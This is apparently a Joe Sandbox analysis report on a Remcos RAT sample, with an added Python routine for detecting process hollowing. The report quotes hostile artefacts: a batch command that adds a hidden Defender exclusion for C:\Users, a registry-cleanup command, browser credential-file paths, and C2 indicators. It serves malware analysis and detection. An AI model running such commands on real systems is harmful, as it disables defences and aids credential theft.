               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Thread created: C:\Windows\SysWOW64\dialer.exe EIP: BB0000
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040FAC7 GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,Sleep,CloseHandle,OpenProcess, \svchost.exe
               Source: C:\Users\user\Desktop\IQl00lxPjo.exe; Process created: C:\Windows\SysWOW64\DpiScaling.exe C:\Windows\System32\DpiScaling.exe
               Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\Public\UKO.bat
               Source: C:\Windows\SysWOW64\cmd.exe; Process created: C:\Windows\SysWOW64\reg.exe reg delete hkcu\Environment /v windir /f
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
               Source: C:\Users\Public\Libraries\Dsqbhgvf.exe; Process created: C:\Windows\SysWOW64\dialer.exe C:\Windows\System32\dialer.exe
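The injection evidence above is the classic hollowing chain: the dropper spawns a Microsoft-signed binary from SysWOW64 (DpiScaling.exe, dialer.exe), writes a buffer starting with 4D5A into it, writes several smaller regions, then starts a thread whose EIP equals one of the written bases; the API sequence at 7_2_0041412B (CreateProcessW, GetThreadContext, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, SetThreadContext, ResumeThread) is the same technique in the unpacked payload. The following is an added example, not Joe Sandbox or Remcos code, of how a detection engineer would correlate those three event types from host telemetry (process-create, cross-process memory write, remote-thread create, as an EDR or ETW consumer would deliver them) into one finding per writer/target pair. The event records are constructed to mirror the report; the PIDs, parent relationships and buffer bytes are assumptions.

```python
"""Process-hollowing triage over host telemetry.

Added example for this report, not Joe Sandbox code. It folds three evidence
classes (memory written into a foreign process, a written buffer whose first
bytes are 4D 5A, a thread started at a written address) into one finding per
writer/target pair. The events at the bottom are constructed to mirror the
report; PIDs, parentage and buffer bytes are assumptions.
"""
from dataclasses import dataclass, field
from typing import Dict, List, Set, Tuple

# Where a Microsoft-shipped host binary normally lives.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# Where a standard user can write; a writer launched from here is the odd one out.
USER_WRITABLE = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


@dataclass
class ProcessCreate:
    pid: int
    ppid: int
    image: str

@dataclass
class MemoryWrite:
    src_pid: int
    dst_pid: int
    base: int
    first_bytes: bytes  # leading bytes of the written buffer

@dataclass
class RemoteThread:
    src_pid: int
    dst_pid: int
    start: int  # EIP of the new thread

@dataclass
class Finding:
    writer: str
    target: str
    severity: str
    reasons: List[str] = field(default_factory=list)


def detect_hollowing(procs, writes, threads) -> List[Finding]:
    by_pid: Dict[int, ProcessCreate] = {p.pid: p for p in procs}
    written: Dict[Tuple[int, int], Set[int]] = {}     # (writer, target) -> bases written
    pe_written: Dict[Tuple[int, int], Set[int]] = {}  # the subset that carried an MZ header
    for w in writes:
        if w.src_pid == w.dst_pid:
            continue  # a process writing its own memory is not injection
        key = (w.src_pid, w.dst_pid)
        written.setdefault(key, set()).add(w.base)
        pe_written.setdefault(key, set())
        if w.first_bytes[:2] == b"MZ":
            pe_written[key].add(w.base)
    thread_starts: Dict[Tuple[int, int], Set[int]] = {}
    for t in threads:
        thread_starts.setdefault((t.src_pid, t.dst_pid), set()).add(t.start)

    findings: List[Finding] = []
    for (src, dst), bases in written.items():
        reasons: List[str] = []
        pe_bases = pe_written[(src, dst)]
        if pe_bases:
            reasons.append("PE image (MZ header) written at " + ", ".join(map(hex, sorted(pe_bases))))
        # A thread whose EIP equals a written base means the writer chose the entry point.
        hijacked = thread_starts.get((src, dst), set()) & bases
        if hijacked:
            reasons.append("remote thread started in written region at " + ", ".join(map(hex, sorted(hijacked))))
        if not reasons:
            continue  # cross-process writes with no code execution are left to other rules
        writer, target = by_pid.get(src), by_pid.get(dst)
        if target is not None and target.ppid == src:
            reasons.append("target was spawned by the writer (hollowing pattern)")
        if (writer is not None and target is not None
                and target.image.lower().startswith(SYSTEM_DIRS)
                and writer.image.lower().startswith(USER_WRITABLE)):
            reasons.append("user-writable writer targeting a Windows system binary")
        findings.append(Finding(
            writer=writer.image if writer else f"pid {src}",
            target=target.image if target else f"pid {dst}",
            severity="high" if pe_bases and hijacked else "medium",
            reasons=reasons))
    return findings


# Constructed events mirroring the report (PIDs, parentage and bytes are assumptions).
SAMPLE_PROCS = [
    ProcessCreate(1000, 500, r"C:\Users\user\Desktop\IQl00lxPjo.exe"),
    ProcessCreate(7000, 1000, r"C:\Windows\SysWOW64\DpiScaling.exe"),
    ProcessCreate(2000, 500, r"C:\Users\Public\Libraries\Dsqbhgvf.exe"),
    ProcessCreate(2500, 2000, r"C:\Windows\SysWOW64\dialer.exe"),
    ProcessCreate(4000, 1, r"C:\Windows\System32\svchost.exe"),
    ProcessCreate(4100, 1, r"C:\Windows\System32\RuntimeBroker.exe"),
]
SAMPLE_WRITES = [
    MemoryWrite(1000, 7000, 0x8D0000, b"\x55\x8b\xec\x83"),      # loader stub, no MZ
    MemoryWrite(1000, 7000, 0x10590000, b"MZ\x90\x00\x03\x00"),  # "value starts with: 4D5A"
    MemoryWrite(2000, 2500, 0x600000, b"\xe8\x00\x00\x00"),
    MemoryWrite(2000, 2500, 0x10590000, b"MZ\x90\x00\x03\x00"),
    MemoryWrite(4000, 4100, 0x1A0000, b"\x00\x01\x02\x03"),      # cross-process write, no thread: not reported
    MemoryWrite(4100, 4100, 0x200000, b"MZ\x90"),                # self-write: ignored
]
SAMPLE_THREADS = [RemoteThread(1000, 7000, 0x8D0000), RemoteThread(2000, 2500, 0x600000)]


def run_sample() -> List[Finding]:
    return detect_hollowing(SAMPLE_PROCS, SAMPLE_WRITES, SAMPLE_THREADS)


if __name__ == "__main__":
    for f in run_sample():
        print(f"[{f.severity}] {f.writer} -> {f.target}")
        for why in f.reasons:
            print("   -", why)
```

The rule deliberately requires either an MZ-headed write or a thread started at a written base before it reports anything: debuggers, accessibility tools and some installers also write into other processes, and keying on "wrote to a system binary it spawned" alone would page on those. The two extra reasons (child of the writer, user-writable writer into a system binary) only raise confidence once execution has been established.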
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_00414F84 StrToIntA,mouse_event
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: Program Manager#
               Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp; Binary or memory string: Program Manager
               Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp; Binary or memory string: Shell_TrayWnd
               Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp; Binary or memory string: Progman
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: Program Manager-
               Source: DpiScaling.exe, 00000007.00000000.726232546.00000000032B0000.00000002.00020000.sdmp, dialer.exe, 00000019.00000000.915462595.0000000002F60000.00000002.00020000.sdmp, dialer.exe, 0000001A.00000002.926676761.0000000003330000.00000002.00020000.sdmp; Binary or memory string: Progmanlock
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: |Program Manager|
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: Program Manager{
               Source: DpiScaling.exe, 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp; Binary or memory string: Program Manager<
               Source: C:\Windows\SysWOW64\cmd.exe; Queries volume information: C:\ VolumeInformation
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044A1D0 EnumSystemLocalesW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0040D1E5 GetLocaleInfoA
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044A21B EnumSystemLocalesW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044A2B6 EnumSystemLocalesW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044A343 GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_004423BA GetLocaleInfoW
               Source: C:\Windows\SysWOW64\DpiScaling.exe; Code function: 7_2_0044A593 GetLocaleInfoW
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,7_2_0044A6BC
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoW,7_2_0044A7C3
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,7_2_0044A890
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: EnumSystemLocalesW,7_2_00441ED1
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,7_2_00449F58
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: GetLocaleInfoW,7_2_105D3228
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: EnumSystemLocalesW,7_2_105D2D3F
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_0042F9B4 cpuid 7_2_0042F9B4
              Source: C:\Windows\SysWOW64\DpiScaling.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00404E9A GetLocalTime,CreateEventA,CreateThread,7_2_00404E9A
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00442C8E _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,7_2_00442C8E
              Source: C:\Windows\SysWOW64\DpiScaling.exeCode function: 7_2_00416D9E GetComputerNameExW,GetUserNameW,7_2_00416D9E

              Stealing of Sensitive Information:

              Yara detected Remcos RAT
              Source: Yara match | File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR
              Contains functionality to steal Firefox passwords or cookies
              Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\ | 7_2_0040A012
              Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: \key3.db | 7_2_0040A012
              Contains functionality to steal Chrome passwords or cookies
              Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data | 7_2_00409EF4

              Remote Access Functionality:

              Yara detected Remcos RAT
              Source: Yara match | File source: 7.2.DpiScaling.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10591a6e.2.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10591a6e.2.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10590000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.10590000.1.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 7.2.DpiScaling.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.923320301.0000000000400000.00000040.00000001.sdmp, type: MEMORY
              Source: Yara match | File source: 00000007.00000002.926675257.0000000002FB7000.00000004.00000020.sdmp, type: MEMORY
              Source: Yara match | File source: Process Memory Space: DpiScaling.exe PID: 3980, type: MEMORYSTR
              Detected Remcos RAT
              Source: DpiScaling.exe | String found in binary or memory: Remcos_Mutex_Inj
              Source: DpiScaling.exe, 00000007.00000002.927365684.0000000010590000.00000040.00000001.sdmp | String found in binary or memory: fso.DeleteFolder "\update.vbsCreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)Unknown exceptionbad castbad locale name: genericiostreamiostream stream errorios_base::badbit setios_base::failbit setios_base::eofbit setlicense_code.txtSoftware\ExeWDRemcos_Mutex_InjInjProductName (64 bit) (32 bit)licenceUserAccess level: AdministratorGetModuleFileNameExAPsapi.dllKernel32.dllGetModuleFileNameExWNtUnmapViewOfSectionntdll.dllGlobalMemoryStatusExkernel32.dllIsWow64Processkernel32GetComputerNameExWIsUserAnAdminShell32SetProcessDEPPolicyEnumDisplayDevicesWuser32EnumDisplayMonitorsGetMonitorInfoWShlwapi.dll1Program Files\Program Files (x86)\overridepth_unenc3.2.1 Prov|
              Source: C:\Windows\SysWOW64\DpiScaling.exe | Code function: cmd.exe | 7_2_004055EA

              Mitre Att&ck Matrix

              The numbers following a technique name are the counts of matched signatures per (sub-)technique, as rendered by the sandbox.

              Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
              Valid Accounts | Scripting1 | Application Shimming1 | Application Shimming1 | Deobfuscate/Decode Files or Information1 | OS Credential Dumping1 | System Time Discovery2 | Remote Services | Archive Collected Data11 | Exfiltration Over Other Network Medium | Ingress Tool Transfer11 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | System Shutdown/Reboot1
              Default Accounts | Native API1 | Windows Service1 | Access Token Manipulation1 | Scripting1 | Input Capture111 | Account Discovery1 | Remote Desktop Protocol | Input Capture111 | Exfiltration Over Bluetooth | Encrypted Channel2 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Defacement1
              Domain Accounts | Command and Scripting Interpreter1 | Registry Run Keys / Startup Folder1 | Windows Service1 | Obfuscated Files or Information2 | Credentials In Files2 | System Service Discovery1 | SMB/Windows Admin Shares | Clipboard Data2 | Automated Exfiltration | Non-Standard Port1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
              Local Accounts | Service Execution2 | Logon Script (Mac) | Process Injection522 | Software Packing1 | NTDS | File and Directory Discovery2 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Remote Access Software1 | SIM Card Swap | | Carrier Billing Fraud
              Cloud Accounts | Cron | Network Logon Script | Registry Run Keys / Startup Folder1 | Masquerading1 | LSA Secrets | System Information Discovery33 | SSH | Keylogging | Data Transfer Size Limits | Non-Application Layer Protocol1 | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
              Replication Through Removable Media | Launchd | Rc.common | Rc.common | Modify Registry1 | Cached Domain Credentials | Security Software Discovery121 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Application Layer Protocol11 | Jamming or Denial of Service | | Abuse Accessibility Features
              External Remote Services | Scheduled Task | Startup Items | Startup Items | Virtualization/Sandbox Evasion1 | DCSync | Virtualization/Sandbox Evasion1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points | | Data Encrypted for Impact
              Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Access Token Manipulation1 | Proc Filesystem | Process Discovery2 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols | | Generate Fraudulent Advertising Revenue
              Exploit Public-Facing Application | PowerShell | At (Linux) | At (Linux) | Process Injection522 | /etc/passwd and /etc/shadow | System Owner/User Discovery1 | Software Deployment Tools | Data Staged | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | Web Protocols | Rogue Cellular Base Station | | Data Destruction
              Supply Chain Compromise | AppleScript | At (Windows) | At (Windows) | Invalid Code Signature | Network Sniffing | Remote System Discovery1 | Taint Shared Content | Local Data Staging | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | File Transfer Protocols | | | Data Encrypted for Impact

              Behavior Graph

              Behavior Graph ID: 484282, Sample: IQl00lxPjo, Start date: 16/09/2021, Architecture: WINDOWS, Score: 100

              Start node signatures: Multi AV Scanner detection for domain / URL; Found malware configuration; Malicious sample detected (through community Yara rule); 4 other signatures

              • IQl00lxPjo.exe (started from the start node)
              • DNS/IP: sn-files.fe.1drv.com, qclvzw.sn.files.1drv.com, onedrive.live.com
              • Dropped file: C:\Users\Public\Libraries\Dsqbhgvf.exe, PE32
              • Signatures: Writes to foreign memory regions; Creates a thread in another existing process (thread injection); Injects a PE file into a foreign processes
              • Started processes: DpiScaling.exe, cmd.exe, cmd.exe
              • Dsqbhgvf.exe (two instances, started from the start node)
              • DNS/IP (each instance): sn-files.fe.1drv.com, 2 other IPs or domains
              • Signatures (first instance): Multi AV Scanner detection for dropped file; Allocates memory in foreign processes
              • Started processes: dialer.exe (one per instance)
              • DpiScaling.exe (started by IQl00lxPjo.exe)
              • DNS/IP: twistednerd.dvrlists.com 31.3.152.100, 49768, 8618, ALTUSNL, Sweden
              • Signatures: Contains functionality to change the wallpaper; Contains functionality to steal Chrome passwords or cookies; Contains functionality to inject code into remote processes; 3 other signatures
              • First cmd.exe (started by IQl00lxPjo.exe) started reg.exe and conhost.exe; reg.exe started conhost.exe
              • Second cmd.exe (started by IQl00lxPjo.exe) started cmd.exe and conhost.exe; that cmd.exe started conhost.exe


              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              Source | Detection | Scanner | Label
              IQl00lxPjo.exe | 32% | Virustotal

              Dropped Files

              Source | Detection | Scanner | Label
              C:\Users\Public\Libraries\Dsqbhgvf.exe | 32% | Virustotal

              Unpacked PE Files

              Source | Detection | Scanner | Label
              7.0.DpiScaling.exe.10590000.3.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              7.0.DpiScaling.exe.10590000.1.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              7.2.DpiScaling.exe.10590000.1.unpack | 100% | Avira | TR/Dropper.Gen
              7.0.DpiScaling.exe.10590000.0.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen
              7.2.DpiScaling.exe.400000.0.unpack | 100% | Avira | HEUR/AGEN.1141389
              7.0.DpiScaling.exe.10590000.2.unpack | 100% | Avira | TR/Crypt.ZPACK.Gen

              Domains

              Source | Detection | Scanner | Label
              twistednerd.dvrlists.com | 10% | Virustotal

              URLs

              Source | Detection | Scanner | Label
              twistednerd.dvrlists.com | 10% | Virustotal
              twistednerd.dvrlists.com | 0% | Avira URL Cloud | safe

              Domains and IPs

              Contacted Domains

              Name | IP | Active | Malicious | Antivirus Detection | Reputation
              twistednerd.dvrlists.com | 31.3.152.100 | true | true | | unknown
              onedrive.live.com | unknown | unknown | false | | high
              qclvzw.sn.files.1drv.com | unknown | unknown | false | | high

              Contacted URLs

              Name | Malicious | Antivirus Detection | Reputation
              twistednerd.dvrlists.com | true | 10%, Virustotal; Avira URL Cloud: safe | unknown

              Contacted IPs

              Public

              IP | Domain | Country | ASN | ASN Name | Malicious
              31.3.152.100 | twistednerd.dvrlists.com | Sweden | 51430 | ALTUSNL | true

                  General Information

                  Joe Sandbox Version: 33.0.0 White Diamond
                  Analysis ID: 484282
                  Start date: 16.09.2021
                  Start time: 07:30:13
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 11m 39s
                  Hypervisor based Inspection enabled: false
                  Report type: full
                  Sample file name: IQl00lxPjo (renamed file extension from none to exe)
                  Cookbook file name: default.jbs
                  Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                  Number of new started processes analysed: 27
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.rans.troj.spyw.evad.winEXE@23/10@7/1
                  EGA Information: Failed
                  HDC Information:
                  • Successful, ratio: 32.2% (good quality ratio 31.3%)
                  • Quality average: 84.8%
                  • Quality standard deviation: 23.8%
                  HCA Information:
                  • Successful, ratio: 98%
                  • Number of executed functions: 40
                  • Number of non-executed functions: 257
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  Warnings:
                  • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                  • Excluded IPs from analysis (whitelisted): 92.122.145.220, 13.107.42.13, 13.107.42.12, 20.82.209.183, 23.55.161.164, 23.55.161.162, 23.55.161.142, 23.55.161.160, 20.54.110.249, 40.112.88.60, 23.216.77.209, 23.216.77.208, 20.50.102.62
                  • Excluded domains from analysis (whitelisted): odc-web-brs.onedrive.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, arc.msn.com, l-0004.l-msedge.net, e12564.dspb.akamaiedge.net, odwebpl.trafficmanager.net.l-0004.dc-msedge.net.l-0004.l-msedge.net, l-0003.l-msedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, sn-files.ha.1drv.com.l-0003.dc-msedge.net.l-0003.l-msedge.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, odc-web-geo.onedrive.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, odc-sn-files-geo.onedrive.akadns.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, odc-sn-files-brs.onedrive.akadns.net, store-images.s-microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                  • Not all processes were analyzed; the report is missing behavior information.
                  • Report creation exceeded maximum time and may have missing disassembly code information.
                  • Report size exceeded maximum capacity and may have missing behavior information.
                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  07:31:30 | API Interceptor | 2x Sleep call for process: IQl00lxPjo.exe modified
                  07:31:36 | Autostart | Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf C:\Users\Public\Libraries\fvghbqsD.url
                  07:31:45 | Autostart | Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Dsqbhgvf C:\Users\Public\Libraries\fvghbqsD.url
                  07:32:57 | API Interceptor | 2x Sleep call for process: Dsqbhgvf.exe modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  Match: twistednerd.dvrlists.com

                  Associated Sample Name / URL | Detection | Context
                  Eoo91zh29a.exe | malicious | 62.102.148.152
                  Electronic Payment Advice.xls | malicious | 62.102.148.152
                  tVjDMtlqb9.exe | malicious | 62.102.148.152
                  aWJOIbEUw4.exe | malicious | 62.102.148.152
                  4R9z1vVrUf.exe | malicious | 62.102.148.152
                  Rv9kLjPu17.exe | malicious | 62.102.148.152
                  JG335Ko0Jt.exe | malicious | 62.102.148.152
                  QJuq3fap2K.exe | malicious | 62.102.148.152
                  xBNJLAeaki.exe | malicious | 62.102.148.130
                  bank.exe | malicious | 62.102.148.130
                  clip.exe | malicious | 185.189.112.27
                  micro.exe | malicious | 185.189.112.27
                  credit.exe | malicious | 185.189.112.27
                  SecuriteInfo.com.VHO.Backdoor.Win32.Convagent.gen.1206.exe | malicious | 213.152.187.215
                  BoFA Remittance Advice-2021207.exe | malicious | 213.152.187.215
                  file2.exe | malicious | 141.98.102.243

                  ASN

                  Match: ALTUSNL

                  Associated Sample Name / URL | Detection | Context
                  PDF.FILE#1145523.vbs | malicious | 206.123.147.48
                  YINFFTpCA4.exe | malicious | 79.142.76.244
                  Instruction copy.exe | malicious | 213.5.70.58
                  XoN2GgRiga.exe | malicious | 128.127.105.184
                  28lvYsFGLl.exe | malicious | 128.127.105.184
                  DECL G50 EURL.xlsx | malicious | 128.127.105.184
                  byodInstCL.exe | malicious | 79.142.69.9
                  x4xlPw0K93.exe | malicious | 79.142.76.244
                  faktura #696498.xlsx | malicious | 79.142.76.244
                  0DySn8eZVx.exe | malicious | 79.142.66.239
                  LdmcHfRWKM.exe | malicious | 79.142.66.239
                  bkCtR51L3O.exe | malicious | 79.142.73.155
                  JUSTIFICANTE TRANSFERENCIA.xlsx | malicious | 79.142.73.155
                  7Frr8Rl49L.exe | malicious | 185.10.56.4

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\Public\KDECO.bat
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:ASCII text, with no line terminators
                  Category:dropped
                  Size (bytes):155
                  Entropy (8bit):4.687076340713226
                  Encrypted:false
                  SSDEEP:3:LjT5LJJFIf9oM3KN6QNb3DM9bWQqA5SkrF2VCceGAFddGeWLCXlRA3+OR:rz81R3KnMMQ75ieGgdEYlRA/R
                  MD5:213C60ADF1C9EF88DC3C9B2D579959D2
                  SHA1:E4D2AD7B22B1A8B5B1F7A702B303C7364B0EE021
                  SHA-256:37C59C8398279916CFCE45F8C5E3431058248F5E3BEF4D9F5C0F44A7D564F82E
                  SHA-512:FE897D9CAA306B0E761B2FD61BB5DC32A53BFAAD1CE767C6860AF4E3AD59C8F3257228A6E1072DAB0F990CB51C59C648084BA419AC6BC5C0A99BDFFA569217B7
                  Malicious:false
                  Preview: start /min powershell -WindowStyle Hidden -inputformat none -outputformat none -NonInteractive -Command "Add-MpPreference -ExclusionPath 'C:\Users'" & exit
                  C:\Users\Public\Libraries\Dsqbhgvf.exe
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                  Category:dropped
                  Size (bytes):811520
                  Entropy (8bit):6.67407039380249
                  Encrypted:false
                  SSDEEP:24576:W0WE0AyOVWoKcwdZHGIZHrIzvlZwXI7Dyj3SaH+MJu:W0WEoQhudZS
                  MD5:9B8AE8EDFE553EDEA6108DCEEBCC57B8
                  SHA1:EAE4825368E0ED56DB5484012303ADD569CB98E9
                  SHA-256:D79BA47A55B5DCB4CF6E76AC13BD3179E1523D5904483232D9CE9D39915DBC69
                  SHA-512:5F357814E91904F33B878691F143B34139FD445E1651DAE8A9825CA4B43710DDF8D2EC32D9F9893D6E93B93259B2AC19D0587FE4AA1B5A4987C064E793B12658
                  Malicious:true
                  Antivirus:
                  • Antivirus: Virustotal, Detection: 32%, Browse
                  Preview: MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\......(........ ....@..............................................@...........................P..,$..............................8n..................................................................................CODE................................ ..`DATA......... ......................@...BSS..........@...........................idata..,$...P...&..................@....tls.................@...................rdata...............@..............@..P.reloc..8n.......p...B..............@..P.rsrc...............................@..P.....................b..............@..P........................................................................................................................................
                  C:\Users\Public\Libraries\fvghbqsD.url
                  Process:C:\Users\user\Desktop\IQl00lxPjo.exe
                  File Type:MS Windows 95 Internet shortcut text (URL=<file:"C:\\Users\\Public\\Libraries\\Dsqbhgvf.exe">), ASCII text, with CRLF line terminators
                  Category:dropped
                  Size (bytes):88
                  Entropy (8bit):4.898248914259409
                  Encrypted:false
                  SSDEEP:3:HRAbABGQYmTWAX+rSF55i0XMdHNBZsGKd5ov:HRYFVmTWDyz0HNBZsb5y
                  MD5:145ACDC90EC748C2BFED3F1698E06966
                  SHA1:CFE41ED0690E729683A35DE0F0A467FEC5ABF3DC
                  SHA-256:7633C8D879C6E3F9549C23640B0571AD58457D4A110F6BCD15CB379DB1DFEE3C
